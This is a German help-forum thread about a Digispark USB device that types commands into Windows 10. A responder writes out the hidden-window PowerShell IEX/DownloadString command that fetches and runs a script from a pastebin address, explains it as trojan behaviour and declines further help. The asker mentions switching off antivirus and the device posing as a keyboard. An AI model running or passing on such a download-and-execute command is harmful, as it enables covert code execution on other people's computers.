Win 10 USB Stick Zugriff verboten (keine rechte?

2 Antworten

Nun endlich bin ich zuhause am Heimischen Rechner.

...und habe Deine verunglücktes Kommandozeile rekonstruiert:

powershell -windowstyle hidden IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/usw....')

die Addresse muss ja nun nicht auch noch Suchmaschinenwirksam verlinkt werden :p

Bild zum Beitrag

..und mit Win+R ausgeführt...

auch ich sehe die gleiche Meldung:

Bild zum Beitrag

Allerdings stellt sich mir nicht mehr die Frage nach dem Warum!

Im übrigen wird auch der Code aus dem Download als Virus identifiziert. (jedoch nur in Form als einzelne Zeile...)

Bild zum Beitrag

Dabei nehme ich an, das der angefragte Stream von einer lokalen Addresse dann den eigentlichen Schadcode enthält.

Der Zeilenweise aufgedröselte Code wir anstandslos ausgeführt und ergibt bei mir logischerweise einen Fehler wegen fehlgeschlagener Verbindung und in dessen Folge bleiben die folgenden Zeilen harmlos.

Dein Digispark scheint im falschen Tastaturlayout zu senden. Ergo auch der Zeichensalat. Irgendwie sind da Probleme bei y, öffnenten Klammern, Doppelpunkt, DivSign, Minus und SingleQuotes.

 - (Computer, PC, Windows 10)  - (Computer, PC, Windows 10)  - (Computer, PC, Windows 10)

Kulrabiefliege 
Beitragsersteller
 22.01.2020, 22:06

Also mittlerweile habe ich diese Meldung gelöst. Ich musste einfach das Kaspersky Anti Virus ausstellen. Aber diesen Fehlercode in roter Schrift habe ich auch und komme ab dort nicht weiter.

0
Erzesel  23.01.2020, 05:13
@Kulrabiefliege

Gehe ich richtig in der Annahme, dass Du das PowershellScript nur irgendwo kopiert hast und nicht wirklich weißt wie es funktioniert? Wäre es Auf deinem Mist gewachsen , wüsstest Du was ich mit "Zeilenweise aufgedröselt" meinte...

Zerlege das nachgeladene Script erst einmal in einzelne Zeilen (der Zeilentrenner ist das Semicolon...)

Wenn Dir Powershell geläufig wäre, würde Dir ein Lichtlein aufgehen.

An dieser Stelle werde ich Dir nicht weiterhelfen, da das Ganze eigentlich dazu dient wiederum Code von einem lokalen Gerät nachzuladen. Warum wohl der ganze Aufwand : Digispark, nachladen von einer Webseite , erneutes Nachladen . Alles Nebelbomben.

Immerhin ist bereits der Nachweis erbracht, das diese Methode keine Sichertslücke mehr darstellt...

Wenn man nichts tückisches Bezweckt genügt es einfach ein PowershellScript einzugeben ohne das ganze Brimborium...

0

Genau wegen solcher Befehle

Schrieb ich in https://www.gutefrage.net/frage/windows-10-zugriff-verboten#answer-335191912

Kein geistig gesunder Programmierer würde ein fremdes PowershellScript unbesehen...

Glücklicherweise war kein Zugriff auf Powershell gestattet und als zweiter Glücksfall ist wohl auch beim Kopieren des Codes einiges schief gegangen.

...da wurden wohl einige Zeichen nicht richtig konvertiert und einige Klammern sind verloren gegangen.

Ich möchte garnicht wissen was da unter der vemurksten Pastebin.com-Addresse nachgeladen werden sollte.

Das EIX (Invoke-Expression) führt einen eingelesen String als Script aus... In diesem Fall wohl eine Script aus dem Internet.

Genau das was ein Trojaner tut.

Wenn Du nur die geringste Ahnung von Powershell hättest, wäre Dir aufgefallen , das dieses Script ziemlich verunglückt ist, oder aus einer Batch welche eine Art Verschleierung für Noops darstellt.

Egal was , ein Download in Verbindung mit EIX bedeutet nie etwas Gutes... , denn kein Virenscanner überprüft einen Webseiten-Quellcode, ob dieser sich eventuell auch als Powershell Code ausführen lässt... (HTML ist doch Harmlos... )

(Hybrid-Script... mehrere Sprachen in einer Datei... ist eines meiner Steckenpferde)

Nicht ohne Grund hat Powershell schärfere Ausführungsbestimmungen als .Exe-Dateien (vielleicht sogar die härtesten von allen Ausführbaren Dateien).

Egal, lass die Finger von Dingen, welche Du nicht verstehst...


Kulrabiefliege 
Beitragsersteller
 22.01.2020, 17:51

Normalerweise erkennt das auch kein Antivirus scanner da sich das Gerät (digispark basiert auf Arduino) als Tastatur ausgibt und damit den Code eingibt und ausführt. Aber eigentlich hast du mir jetzt nicht viel weitergeholfen.

0